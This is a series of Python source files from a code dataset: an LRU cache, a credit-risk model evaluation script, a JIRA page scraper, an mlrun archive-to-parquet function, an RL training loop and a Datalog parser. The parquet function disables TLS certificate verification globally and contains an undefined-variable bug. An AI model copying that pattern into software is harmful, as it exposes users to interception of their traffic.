one_shot(argv[1:])\n","sub_path":"00autostart.py","file_name":"00autostart.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"135098737","text":"# -*- coding: utf-8 -*-\n\"\"\"\nLRU cache utility class.\n\n:author: Jinja Team.\n:copyright: Copyright (c) 2014, deipi.com LLC. 
All Rights Reserved.\n:copyright: Copyright (c) 2010 by the Jinja Team.\n:license: BSD, see LICENSE for license details.\n\nChanges:\n\nThis is different from Jinja's LRUCache in that it caches by type, so cached\nvalues of different types are cached in different queues of the same capacity.\n\n\"\"\"\nfrom __future__ import absolute_import\n\nfrom collections import deque\nfrom threading import RLock\n\n\nclass LRUCache(object):\n    \"\"\"\n    A type-based LRU Cache implementation.\n\n    This is fast for small capacities (something below 1000) but doesn't scale.\n\n    \"\"\"\n\n    def __init__(self, capacity):\n        self.capacity = capacity\n        self._wlock = RLock()\n        self._mapping = {}\n        self._queues = {}\n\n    def __getstate__(self):\n        return {\n            'capacity': self.capacity,\n            '_mapping': self._mapping,\n            '_queues': self._queues,\n        }\n\n    def __setstate__(self, d):\n        self.__dict__.update(d)\n\n    def __getnewargs__(self):\n        return (self.capacity,)\n\n    def copy(self):\n        \"\"\"\n        Return a shallow copy of the instance.\n\n        \"\"\"\n        rv = self.__class__(self.capacity,)\n        rv._mapping.update(self._mapping)\n        # iterate items(); iterating the dict directly yields only keys\n        rv._queues = dict((k, deque(v)) for k, v in self._queues.items())\n        return rv\n\n    def get(self, key, default=None):\n        \"\"\"\n        Return an item from the cache dict or ``default``\n\n        \"\"\"\n        try:\n            return self[key]\n        except KeyError:\n            return default\n\n    def setdefault(self, key, default=None):\n        \"\"\"\n        Set ``default`` if the key is not in the cache otherwise\n        leave unchanged. Return the value of this key.\n\n        \"\"\"\n        with self._wlock:\n            try:\n                return self[key]\n            except KeyError:\n                self[key] = default\n                return default\n\n    def clear(self):\n        \"\"\"Clear the cache.\"\"\"\n        with self._wlock:\n            self._mapping.clear()\n            self._queues.clear()\n\n    def __contains__(self, key):\n        \"\"\"Check if a key exists in this cache.\"\"\"\n        return key in self._mapping\n\n    def __len__(self):\n        \"\"\"Return the current size of the cache.\"\"\"\n        return len(self._mapping)\n\n    def __repr__(self):\n        return '<%s %r>' % (\n            self.__class__.__name__,\n            self._mapping\n        )\n\n    def __getitem__(self, key):\n        \"\"\"Get an item from the cache. Moves the item up so that it has the\n        highest priority then.\n\n        Raise a `KeyError` if it does not exist.\n        \"\"\"\n        with self._wlock:\n            value = self._mapping[key]\n            queue = self._queues.setdefault(type(value), deque())\n            if not len(queue) or queue[-1] != key:\n                try:\n                    queue.remove(key)\n                except ValueError:\n                    pass\n                queue.append(key)\n            return value
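\n\n    # NOTE (added): eviction in __setitem__ below is per type -- storing a new\n    # value only evicts the least-recently-used key from the queue holding\n    # values of the same type. Sketch: with capacity=1, c['a'] = 1 then\n    # c['b'] = 'x' then c['d'] = 2 evicts 'a' (int queue full) but keeps 'b'.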
\n    def __setitem__(self, key, value):\n        \"\"\"\n        Sets the value for an item. Moves the item up so that it\n        has the highest priority then.\n\n        \"\"\"\n        with self._wlock:\n            try:\n                del self[key]\n            except KeyError:\n                pass\n            queue = self._queues.setdefault(type(value), deque())\n            if len(queue) == self.capacity:\n                del self._mapping[queue.popleft()]\n            self._mapping[key] = value\n            queue.append(key)\n\n    def __delitem__(self, key):\n        \"\"\"\n        Remove an item from the cache dict.\n        Raise a ``KeyError`` if it does not exist.\n\n        \"\"\"\n        with self._wlock:\n            try:\n                # pop the mapping entry as well; the original only touched the queue\n                value = self._mapping.pop(key)\n            except KeyError:\n                return\n            queue = self._queues.setdefault(type(value), deque())\n            try:\n                queue.remove(key)\n                if not len(queue):\n                    del self._queues[type(value)]\n            except ValueError:\n                pass\n\n    def items(self):\n        \"\"\"\n        Return a list of items.\n\n        \"\"\"\n        with self._wlock:\n            result = [(key, self._mapping[key]) for key in self]\n            result.reverse()\n            return result\n\n    def iteritems(self):\n        \"\"\"\n        Iterate over all items.\n\n        \"\"\"\n        return iter(self.items())\n\n    def values(self):\n        \"\"\"\n        Return a list of all values.\n\n        \"\"\"\n        return [x[1] for x in self.items()]\n\n    def itervalue(self):\n        \"\"\"\n        Iterate over all values.\n\n        \"\"\"\n        return iter(self.values())\n\n    def keys(self):\n        \"\"\"\n        Return a list of all keys ordered by most recent usage.\n\n        \"\"\"\n        with self._wlock:\n            result = [item for sublist in self._queues.values() for item in sublist]\n            return result\n\n    def iterkeys(self):\n        \"\"\"\n        Iterate over all keys in the cache dict, ordered by\n        the most recent usage.\n\n        \"\"\"\n        return iter(self.keys())\n\n    __iter__ = iterkeys\n\n    def __reversed__(self):\n        \"\"\"\n        Iterate over the keys in the cache dict, newest items\n        coming first.\n\n        \"\"\"\n        # reversed(self) would recurse into __reversed__ forever\n        return reversed(self.keys())\n\n    __copy__ = copy\n\n\n# register the LRU cache as mutable mapping if possible\ntry:\n    from collections.abc import MutableMapping\n    MutableMapping.register(LRUCache)\nexcept ImportError:\n    pass\n","sub_path":"dubalusim/dubalu/python-packages/lru/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":5490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"156474176","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score, precision_score, recall_score, roc_auc_score\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.preprocessing import StandardScaler\n\nfrom univariate.common import tools\n\n# valid_columns = [\n#     'loan_counts',\n#     'other_loan_counts',\n#     'house_loan_counts',\n#     'house_loan2_counts',\n#     'paid_loan_counts',\n#     'unpaid_loan_counts',\n#     'card_counts',\n#     'undestroy_card_counts',\n#     'destroy_card_counts',\n#     'unpaid_loan_limit',\n#     'paid_loan_limit',\n#     'undestroy_card_limit',\n#     'destroy_card_limit',\n#     'first_loan_open_time_range',\n#     'last_paid_loan_end_time_range',\n#     'first_card_open_time_range',\n#     'last_destroy_card_end_time_range',\n#\n#     'loan_overdue_counts',\n#     'loan_overdue_counts_ratio',\n#     'loan_overdue_times',\n#     'loan_overdue_max_duration',\n#     'loan_overdue_max_monthly_amount',\n#     'loan_overdue_max_monthly_amount_ratio',\n#     'loan_last_overdue_time_range',\n#     'card_overdue_counts',\n#     'card_overdue_counts_ratio',\n#     'card_overdue_times',\n#     'card_overdue_max_duration',\n#     'card_overdue_max_monthly_amount',\n#     'card_overdue_max_monthly_amount_ratio',\n#     'card_last_overdue_time_range',\n#\n#     'overdue_times_past_year',\n#     'unpaid_loan_type_counts',\n#     
'unpaid_loan_branch_counts',\n# 'unpaid_loan_corporation_counts',\n# 'unpaid_loan_average_limit',\n# 'unpaid_loan_balance',\n# 'unpaid_loan_average_balance',\n# 'unpaid_loan_balance_ratio',\n# 'unpaid_loan_max_remain_payment_cycle',\n# 'unpaid_microcredit_loan_counts',\n# 'unpaid_microcredit_loan_limit',\n# 'unpaid_unfixed_loan_counts',\n# 'unpaid_unfixed_loan_limit',\n# 'unpaid_microcredit_loan_max_remain_payment_cycle',\n# 'new_microcredit_loan_counts',\n# 'new_microcredit_loan_limit',\n# 'new_loan_counts',\n# 'new_loan_type_counts',\n# 'new_loan_limit',\n#\n# 'undestroy_card_max_limit',\n# 'paid_microcredit_loan_counts',\n# 'paid_microcredit_loan_limit',\n# 'last_paid_microcredit_loan_end_time_range',\n# 'paid_unfixed_loan_counts',\n# 'paid_unfixed_loan_limit',\n# 'last_paid_unfixed_loan_end_time_range'\n# ]\n\nvalid_columns = [\n 'loan_counts',\n 'other_loan_counts',\n 'house_loan_counts',\n 'house_loan2_counts',\n 'paid_loan_counts',\n 'unpaid_loan_counts',\n 'card_counts',\n 'undestroy_card_counts',\n 'destroy_card_counts',\n 'unpaid_loan_limit',\n 'paid_loan_limit',\n 'undestroy_card_limit',\n 'destroy_card_limit',\n 'first_loan_open_time_range',\n 'last_paid_loan_end_time_range',\n 'first_card_open_time_range',\n 'last_destroy_card_end_time_range',\n 'loan_overdue_counts',\n 'loan_overdue_counts_ratio',\n 'loan_overdue_times',\n 'loan_overdue_max_duration',\n 'loan_overdue_max_monthly_amount',\n 'loan_overdue_max_monthly_amount_ratio',\n 'loan_last_overdue_time_range',\n 'card_overdue_counts',\n 'card_overdue_counts_ratio',\n 'card_overdue_times',\n 'card_overdue_max_duration',\n 'card_overdue_max_monthly_amount',\n 'card_overdue_max_monthly_amount_ratio',\n 'card_last_overdue_time_range',\n 'overdue_times_past_year',\n 'unpaid_loan_type_counts',\n 'unpaid_loan_branch_counts',\n 'unpaid_loan_corporation_counts',\n 'unpaid_loan_average_limit',\n 'unpaid_loan_balance',\n 'unpaid_loan_average_balance',\n 'unpaid_loan_balance_ratio',\n 'unpaid_loan_max_remain_payment_cycle',\n 'unpaid_microcredit_loan_counts',\n 'unpaid_microcredit_loan_limit',\n 'unpaid_unfixed_loan_counts',\n 'unpaid_unfixed_loan_limit',\n 'unpaid_microcredit_loan_max_remain_payment_cycle',\n 'new_microcredit_loan_counts',\n 'new_microcredit_loan_limit',\n 'new_loan_counts',\n 'new_loan_type_counts',\n 'new_loan_limit',\n 'undestroy_card_max_limit',\n 'paid_microcredit_loan_counts',\n 'paid_microcredit_loan_limit',\n 'last_paid_microcredit_loan_end_time_range',\n 'paid_unfixed_loan_counts',\n 'paid_unfixed_loan_limit',\n 'last_paid_unfixed_loan_end_time_range',\n 'new_paid_loan_counts',\n 'new_paid_loan_limit',\n 'new_paid_loan_average_limit',\n 'new_paid_microcredit_loan_counts',\n 'new_paid_microcredit_loan_limit',\n 'new_paid_microcredit_loan_average_limit',\n 'new_paid_unfixed_loan_counts',\n 'new_paid_unfixed_loan_limit',\n 'new_paid_unfixed_loan_average_limit',\n 'paid_loan_counts_in_half_year',\n 'paid_loan_limit_in_half_year',\n 'paid_loan_average_limit_in_half_year',\n 'paid_microcredit_loan_counts_in_half_year',\n 'paid_microcredit_loan_limit_in_half_year',\n 'paid_microcredit_loan_average_limit_in_half_year',\n]\n\nlabel_list = []\nthreshold_list = []\nprecision_list = []\nrecall_list = []\nf1_list = []\nauc_list = []\nblack_ratio_list = []\nblack_num_list = []\nall_num_list = []\nfor threshold in [1, 2, 3, 4, 5, 6, 7]:\n for label in ['label_loan_card', 'label_loan', 'label_card']:\n df_train = pd.read_csv(\n 'data/train_threshold_{}_20180126_{}.csv'.format(threshold, label),\n encoding='gbk')\n 
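# Hedged sketch (assumption, not the original helpers): 'tools.fill' and\n        # 'tools.delete_or_fill_by_quantile' come from univariate.common and are not shown here;\n        # assuming median imputation plus clipping to the 5th/95th percentiles, a plain-pandas\n        # equivalent of the two calls below would be roughly:\n        #   col = col.fillna(col.median())\n        #   lo, hi = col.quantile(0.05), col.quantile(0.95)\n        #   col = col.clip(lower=lo, upper=hi)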
df_train.replace(np.nan, 0, inplace=True)\n df_test = pd.read_csv(\n 'data/test_threshold_{}_20180126_{}.csv'.format(threshold, label),\n encoding='gbk')\n df_test.replace(np.nan, 0, inplace=True)\n\n for column in valid_columns:\n for df in [df_train, df_test]:\n df[column] = tools.fill(df[column], method='median')\n df[column] = tools.delete_or_fill_by_quantile(\n df[column], min_q=5, max_q=95, delete=False)\n\n X_train = df_train[valid_columns]\n y_train = df_train[label]\n X_test = df_test[valid_columns]\n y_test = df_test[label]\n\n scaler = StandardScaler()\n X_train_tr = scaler.fit_transform(X_train)\n X_test_tr = scaler.transform(X_test)\n X_train_tr = pd.DataFrame(\n X_train_tr, columns=X_train.columns, index=X_train.index)\n X_test_tr = pd.DataFrame(\n X_test_tr, columns=X_test.columns, index=X_test.index)\n\n forest_clf = RandomForestClassifier(\n n_estimators=20,\n n_jobs=-1,\n random_state=42,\n class_weight='balanced_subsample')\n forest_clf.fit(X_train, y_train)\n y_probas = cross_val_predict(\n forest_clf, X_train_tr, y_train, cv=3, method='predict_proba')\n y_scores = y_probas[:, 1]\n\n log_clf = LogisticRegression()\n log_clf.fit(X_train_tr, y_train)\n log_coef_df = pd.DataFrame({\n 'indicator': valid_columns,\n 'coef': log_clf.coef_[0]\n })\n log_coef_df.to_csv(\n 'data/log_coef_{}_{}.csv'.format(label, threshold), index=False)\n\n # fpr, tpr, thresholds = roc_curve(y_train, y_scores)\n # plot_roc_curve(fpr, tpr, \"Random Forest\")\n # plt.show()\n # plt.close()\n # precisions, recalls, thresholds = precision_recall_curve(y_train, y_scores)\n # plot_precision_recall_vs_threshold(precisions, recalls, thresholds)\n # plt.show()\n # plt.close()\n # plot_precision_vs_recall(precisions, recalls, label='Random Forest')\n # plt.show()\n # plt.close()\n max_f1 = 0\n opt_cutoff = 0.5\n for cutoff in np.linspace(0, 1, 100):\n precision = precision_score(y_train, y_scores >= cutoff)\n recall = recall_score(y_train, y_scores >= cutoff)\n f1 = f1_score(y_train, y_scores >= cutoff)\n if f1 > max_f1:\n max_f1 = f1\n opt_cutoff = cutoff\n precision = precision_score(y_train, y_scores >= opt_cutoff)\n recall = recall_score(y_train, y_scores >= opt_cutoff)\n f1 = f1_score(y_train, y_scores >= opt_cutoff)\n auc = roc_auc_score(y_train, y_scores)\n black_num = sum(y_train)\n all_num = len(y_train)\n black_ratio = black_num / all_num\n label_list.append(label)\n threshold_list.append(threshold)\n precision_list.append(precision)\n recall_list.append(recall)\n f1_list.append(f1)\n auc_list.append(auc)\n black_ratio_list.append(black_ratio)\n black_num_list.append(black_num)\n all_num_list.append(all_num)\n\nmodel_measurement_df = pd.DataFrame(\n {\n 'label': label_list,\n 'threshold': threshold_list,\n 'precision': precision_list,\n 'recall': recall_list,\n 'f1': f1_list,\n 'auc': auc_list,\n 'black_ratio': black_ratio_list,\n 'black_num': black_num_list,\n 'all_num': all_num_list\n },\n columns=[\n 'label', 'threshold', 'precision', 'recall', 'f1', 'auc',\n 'black_ratio', 'black_num', 'all_num'\n ])\n\nmodel_measurement_df.to_csv(\n 'data/random_model_measurement_20180126.csv', index=False)\n","sub_path":"rt_model_measurement.py","file_name":"rt_model_measurement.py","file_ext":"py","file_size_in_byte":9010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"384874112","text":"#import selenium\r\nfrom selenium import webdriver\r\n#from selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.common.by import By\r\nfrom 
selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\n#import unittest\r\n#import time\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\n\r\ndef getData(selected_value):\r\n '''\r\n chromedriver = 'C:\\\\Users\\\\rishabhchaudhary\\Downloads\\chromedriver_win32\\chromedriver.exe'\r\n #Edgedriver = 'C:\\\\Users\\RishabhChaudhary\\Downloads\\MicrosoftWebDriver.exe'\r\n #browser = webdriver.Edge(Edgedriver)\r\n\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('headless')\r\n\r\n # set the window size\r\n options.add_argument('window-size=1200x600')\r\n\r\n browser = webdriver.Chrome(chromedriver, chrome_options=options)\r\n\r\n browser.get('https://jira.adeptra.com/secure/Dashboard.jspa')\r\n\r\n # Finding username and password fields\r\n try:\r\n userField = WebDriverWait(browser, 120).until(EC.presence_of_element_located((By.NAME, \"os_username\")))\r\n passwordField = WebDriverWait(browser, 120).until(EC.presence_of_element_located((By.NAME, \"os_password\")))\r\n finally:\r\n pass\r\n\r\n userField.send_keys(\"username\")\r\n passwordField.send_keys(\"password\")\r\n\r\n login_attempt = browser.find_element_by_xpath(\"//*[@id='login']\")\r\n login_attempt.submit()\r\n\r\n create_link = None\r\n\r\n try:\r\n create_link = WebDriverWait(browser, 120).until(\r\n EC.presence_of_element_located((By.ID, \"create_link\")))\r\n finally:\r\n pass\r\n\r\n if create_link:\r\n try:\r\n searchField = WebDriverWait(browser, 120).until(\r\n EC.presence_of_element_located((By.NAME, \"searchString\")))\r\n searchField.send_keys(\"CUSSGFRM-1\")\r\n searchField.submit()\r\n finally:\r\n pass\r\n\r\n html = browser.page_source\r\n\r\n soup = BeautifulSoup(html, 'html5lib')\r\n first_paragraph = soup.find('p') # or just soup.p\r\n first_paragraph\r\n '''\r\n\r\n\r\n #print(soup.prettify())\r\n\r\n with open(\"data.html\") as fp:\r\n soup = BeautifulSoup(fp, 'html5lib')\r\n\r\n JIRA = []\r\n DESC = []\r\n PHASE = []\r\n STATUS = []\r\n ASSIN = []\r\n\r\n for row in soup.find_all(class_ = 'issuerow'):\r\n JIRA.append(row.attrs['data-issuekey'])\r\n for col in row.find_all(class_ = 'stsummary'):\r\n #DESC.append(col.findall)\r\n for link in col.find_all('a'):\r\n DESC.append(link.text.strip())\r\n\r\n for col in row.find_all(class_='status'):\r\n for span in col.find_all('span'):\r\n STATUS.append(span.text.strip())\r\n\r\n for col in row.find_all(class_='assignee'):\r\n for link in col.find_all('a'):\r\n ASSIN.append(link.text.strip())\r\n\r\n delim = ' ','-',':','_'\r\n regexp = '|'.join(map(re.escape, delim))\r\n NEWDESC = []\r\n for desc in DESC:\r\n if ('qa' in desc.lower()) or ('cqa' in desc.lower()) or ('prod' in desc.lower()):\r\n PHASE.append(re.split(regexp, desc)[0].strip())\r\n NEWDESC.append(' '.join(re.split(regexp, desc)[1:]).replace('-',' ').strip())\r\n else:\r\n PHASE.append('NA')\r\n NEWDESC.append(desc.strip())\r\n\r\n df = pd.DataFrame({'WorkBlock': np.nan, 'JIRA': JIRA,\r\n 'Description': NEWDESC,\r\n 'Phase': PHASE,\r\n 'Status': STATUS,\r\n 'Assignee': ASSIN})\r\n\r\n df = df.fillna(value=selected_value)\r\n df = df.set_index(['WorkBlock', 'JIRA'])\r\n\r\n return df\r\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"309004307","text":"# Copyright 2018 Iguazio\n#\n# Licensed under the Apache License, Version 2.0 (the 
\"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n # Legacy Python that doesn\"t verify HTTPS certificates by default\n pass\nelse:\n # Handle target environment that doesn\"t support HTTPS verification\n ssl._create_default_https_context = _create_unverified_https_context\n\nimport os\nimport json\nimport numpy as np\nimport pandas as pd\nimport pyarrow.parquet as pq\nimport pyarrow as pa\nfrom cloudpickle import dump, load\n\nfrom mlrun.execution import MLClientCtx\nfrom mlrun.datastore import DataItem\nfrom mlrun.artifacts import PlotArtifact, TableArtifact\n\nfrom typing import IO, AnyStr, Union, List, Optional\n\ndef arc_to_parquet(\n context: MLClientCtx,\n archive_url: Union[str, DataItem],\n header: Optional[List[str]] = None,\n chunksize: int = 10_000,\n dtype=None,\n encoding: str = \"latin-1\",\n key: str = \"data\",\n dataset: Optional[str] = None,\n part_cols = [],\n file_ext: str = 'pqt'\n) -> None:\n \"\"\"Open a file/object archive and save as a parquet file.\n\n Partitioning requires precise specification of column types.\n\n :param context: function context\n :param archive_url: any valid string path consistent with the path variable\n of pandas.read_csv, including strings as file paths, as urls, \n pathlib.Path objects, etc...\n :param header: column names\n :param chunksize: (0) row size retrieved per iteration\n :param dtype destination data type of specified columns\n :param encoding (\"latin-8\") file encoding\n :param key: key in artifact store (when log_data=True)\n :param dataset: (None) if not None then \"target_path/dataset\"\n is folder for partitioned files\n :param file_ext: (pqt) parquet file extension\n :param part_cols: ([]) list of partitioning columns\n\n \"\"\"\n base_path = context.artifact_path\n os.makedirs(base_path, exist_ok=True)\n\n if dataset is not None:\n dest_path = os.path.join(base_path, dataset)\n exists = os.path.isdir(dest_path)\n else:\n dest_path = os.path.join(base_path, key+f\".{file_ext}\")\n exists = os.path.isfile(dest_path)\n\n # todo: more logic for header\n if not exists:\n context.logger.info(\"destination file does not exist, downloading\")\n pqwriter = None\n for i, df in enumerate(pd.read_csv(archive_url, \n chunksize=chunksize, \n names=header,\n encoding=encoding, \n dtype=dtype)):\n table = pa.Table.from_pandas(df)\n if i == 0:\n if dataset:\n # just write header here\n pq.ParquetWriter(os.path.join(base_path,\"header-only.pqt\"), table.schema)\n else:\n # start writing file\n pqwriter = pq.ParquetWriter(dest_path, table.schema)\n context.log_artifact(\"header\", local_path=\"header-only.pqt\")\n if dataset:\n pq.write_to_dataset(table, root_path=dest_path, partition_cols=partition_cols)\n else:\n pqwriter.write_table(table)\n if pqwriter:\n pqwriter.close()\n\n context.logger.info(f\"saved table to {dest_path}\")\n else:\n context.logger.info(\"destination file already exists\")\n context.log_artifact(key, 
local_path=key+\".pqt\")\n","sub_path":"arc_to_parquet/arc_to_parquet.py","file_name":"arc_to_parquet.py","file_ext":"py","file_size_in_byte":4137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"55862735","text":"# testing ....\n\n\n'''\n智能体与环境交互的基本流程\n\n整体分为四部分: 参数读入与初始化, 环境交互, 记忆重构, 参数训练\n'''\n\nimport numpy as np \nfrom six.moves import range\nfrom six.moves import zip\nfrom absl import app\nfrom absl import flags\nfrom envs.tpycolab import tenv as pycolab_env\nimport GBMRagent\nimport tensorflow as tf\nimport tensorflow.keras as keras\nimport tensorflow.keras.layers as layers\nimport gym\n\n'''\n超参数读入:��境相关,流程相关,智能体相关\n'''\nFLAGS = flags.FLAGS\n# 环境相关\n\n# flags.DEFINE_enum('pycolab_game', 'key_to_door',\n# ['key_to_door', 'active_visual_match'],\n# 'The name of the game in pycolab environment')\n# flags.DEFINE_integer('pycolab_num_apples', 10,\n# 'Number of apples to sample from the distractor grid.')\n# flags.DEFINE_float('pycolab_apple_reward_min', 1.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_float('pycolab_apple_reward_max', 10.,\n# 'A reward range [min, max) to uniformly sample from.')\n# flags.DEFINE_boolean('pycolab_fix_apple_reward_in_episode', True,\n# 'Fix the sampled apple reward within an episode.')\n# flags.DEFINE_float('pycolab_final_reward', 10.,\n# 'Reward obtained at the last phase.')\n# flags.DEFINE_boolean('pycolab_crop', True,\n# 'Whether to crop observations or not.')\n\n# 尝试MsPacman\n# flags.DEFINE_enum('atari_game',\n# 'MsPacman-v0',\n# 'The name of the game in atari')\n\n# 流程相关\n\nflags.DEFINE_boolean('print_functionname', True,\n 'Whether to print_functionname.')\n\n# 智能体相关\n\nflags.DEFINE_integer('memory_size', 1000,'the number of nodes we are able to store in the graph.')\nflags.DEFINE_integer('memory_word_size', 32,'the lenth of words we are able to store in the graph.')\n\n\ndef main(_):\n if FLAGS.print_functionname == True:\n print(\"Hello world!\")\n\n # 环境初始化\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game,\n # 'num_apples': FLAGS.pycolab_num_apples,\n # 'apple_reward': [FLAGS.pycolab_apple_reward_min,\n # FLAGS.pycolab_apple_reward_max],\n # 'fix_apple_reward_in_episode': FLAGS.pycolab_fix_apple_reward_in_episode,\n # 'final_reward': FLAGS.pycolab_final_reward,\n # 'crop': FLAGS.pycolab_crop\n # }\n # env_kwargs = {\n # 'game': FLAGS.pycolab_game\n # }\n # if FLAGS.print_functionname == True:\n # print(\"env_kwargs: \",env_kwargs)\n # env_builder = pycolab_env.PycolabEnvironment\n # env=env_builder(**env_kwargs) #以字典的形式传递参数,方便函数内部对参数的分别引用\n env = gym.make(\"MsPacman-v0\")\n #env = gym.make(\"CartPole-v1\")\n # ep_length = env.episode_length# 在key_to_door的环境中定义的\n ep_length = 200\n #num_actions = env.num_actions\n num_actions = env.action_space.n\n observation = env.reset()\n dim_obs = observation.shape\n if FLAGS.print_functionname == True:\n print(\"ep_length\",ep_length,\"num_actions\",num_actions,\"dim_obs\",dim_obs)\n\n # 智能体初始化\n agent = GBMRagent.Agent(num_actions=num_actions,dim_obs=dim_obs,memory_size=FLAGS.memory_size,memory_word_size=FLAGS.memory_word_size)\n # agent.vae_initial()\n agent.vaev_initial()\n\n ith_episode = 0 \n reward2step =[]\n while True:\n # 开始新的episode\n ith_episode += 1\n if FLAGS.print_functionname == True:\n print(\"ith_episode\", ith_episode)\n \n observation = env.reset()\n state = agent.obs2state(observation)\n observations =[]\n rewards =[]# 这个后来要用来算v值做监督信号\n epshistory = agent.EpsHistory_Initial()\n \n\n # 环境交互\n for tt in 
range(ep_length):\n # if FLAGS.print_functionname == True:\n # print(\"jth_step\",tt)\n #action = agent.TakeRandomAction()\n action, readinfo = agent.infer(state,epshistory)\n observation_, reward,_,_ = env.step(action)\n #env.render()\n state_ = agent.obs2state(observation_)\n epshistory = agent.EpsHistory_add([state,action,reward,state_])\n observation= observation_\n state= state_\n observations.append(observation)\n rewards.append(reward)\n reward2step.append(reward)\n\n # 记忆重构\n agent.Memory_update(epshistory)\n agent.Memory_abstract()\n agent.Memory_reconstruct()\n\n # 训练参数\n observations = np.stack(observations)\n rewards = np.stack(rewards)\n input_train = observations.reshape(ep_length, observations.shape[1]*observations.shape[2]*observations.shape[3]).astype('float32') / 255 \n rewards = rewards.reshape(ep_length,1).astype('float32') / 255 \n agent.vaev_train(input_train,rewards,epochs =2, batch_size =64)\n agent.train_agg()\n if len(reward2step)%100==0:\n print(\"write current data\",len(reward2step))\n np.save(\"rewstep.npy\",reward2step)\n\n\nif __name__ == '__main__':\n with tf.device('/gpu:0'):\n app.run(main)\n","sub_path":"Base/run_MsPacman.py","file_name":"run_MsPacman.py","file_ext":"py","file_size_in_byte":5290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"173396158","text":"import sys\nfrom sqlalchemy import create_engine\nfrom functools import reduce\nimport re\n\n__all__ = ['DatalogParser']\n\nclass DatalogParser:\n def __init__(self, q):\n q0 = q[0]\n self.result = q0['result'] # Ans(numunits, firstname, billdate)\n self.conditions = q0['condition'] # ['orders.orderid > 1000', 'orders.numunits > 1']\n\n tables = q0['table'] # ['orders(numunits, customerid, orderid)', 'customers(firstname, customerid)', 'orderlines(billdate, orderid)']\n\n self.source_tables = {}\n self.table_columns = {}\n self.table_column_idx = {}\n self.column_to_table = {}\n self.resolveSourceTables(tables)\n self.return_columns = self.getReturnColumns(self.result) #numunits, firstname, billdate\n\n self.join_columns = self.getJoinColumns(self.table_columns)\n self.table_conditions = self.getTableConditions(self.conditions)\n #self.resolveNegation()\n\n self.groupby = None\n self.aggregation = None\n self.resolveAggregation(q0['groupby'])\n self.limit = q0.get('limit', None)\n\n self.validate()\n\n def resolveAggregation(self, groupby):\n ''' 'groupby': { 'key': 'pid', 'aggregation': ['count(oid, total_orders)', 'sum(price, total_value)']},'''\n if not groupby: return\n if 'key' not in groupby or 'aggregation' not in groupby:\n print(\"groupby must be dict of {key: ..., aggregation: ...}\\n\")\n exit(1)\n groupkey,aggs = groupby['key'], groupby['aggregation']\n source,table = list(self.column_to_table[groupkey].items())[0]\n self.groupby = {'source': source, 'table':table, 'column': groupkey}\n \n self.aggregation = {}\n for agg in aggs:\n match = re.search(\"(\\S+)\\((\\S+),(\\S+)\\)\", re.sub(\"\\s\", '', agg))\n if match:\n func,src_col,tgt_col = match.group(1), match.group(2), match.group(3)\n self.aggregation[tgt_col] = (func, src_col)\n\n def validate(self):\n return True\n #for col in self.return_columns:\n # if col not in self.column_to_table:\n # raise Exception(\"return column '{}' in header doesn't exist in body!\".format(col))\n\n def resolveSourceTables(self, tables):\n self.source_tables = {}\n self.column_to_table = {}\n for table in tables:\n match = re.search(\"(\\w+)\\.(\\w+)\\((.*)\\)\", table)\n if not match:\n 
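# The regex above only accepts '<source>.<table>(col1, col2, ...)'; for example\n                # re.search(\"(\\w+)\\.(\\w+)\\((.*)\\)\", \"db1.orders(oid, price)\") yields the\n                # groups ('db1', 'orders', 'oid, price') -- 'db1.orders(oid, price)' is an illustrative value.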
print(\"datalog table '{}' must follow pattern .
  • (col1, col2, ...)\\n\".format(table))\n exit(1)\n source, tablename, str_columns = match.group(1), match.group(2), match.group(3)\n self.table_column_idx[tablename] = {}\n if source not in self.source_tables: self.source_tables[source] = []\n self.source_tables[source].append(tablename)\n self.table_columns[tablename] = re.sub('\\s','', str_columns).split(',')\n for idx,col in enumerate(self.table_columns[tablename]):\n self.table_column_idx[tablename][col] = idx\n if col not in self.column_to_table: self.column_to_table[col] = {}\n self.column_to_table[col][source] = tablename\n\n # Given a datalog query of form - \"Ans(numunits, firstname, billdate), orders.orderid > 1000, orders.numunits > 1\"\n # this method extracts the column names from it\n def getReturnColumns(self, datalog):\n return [col.strip() for col in datalog[(datalog.index(\"(\")+1): datalog.index(\")\")].split(\",\")]\n\n # Dictionary of {numunits:orders, customerid:orders;customers} etc.\n def getJoinColumns(self, table_columns):\n col_map = {}\n for table,columns in table_columns.items():\n for col in columns:\n if col == '_': continue\n if col in col_map:\n col_map[col].append(table)\n else:\n col_map[col] = [table]\n\n return {col: col_map[col] for col in col_map if len(col_map[col]) > 1}\n\n def getTableConditions(self, conditions):\n cond_map = {}\n for cond in conditions:\n match = re.search(\"(\\S+)\\s*([>=<]+)\\s*(.+)\", cond)\n if not match:\n print(\"bad condition pattern: {}\".format(cond))\n exit(1)\n lop, op, rop = match.group(1), match.group(2), match.group(3)\n # HACK: suppose only 1 operand is column, and pure column in 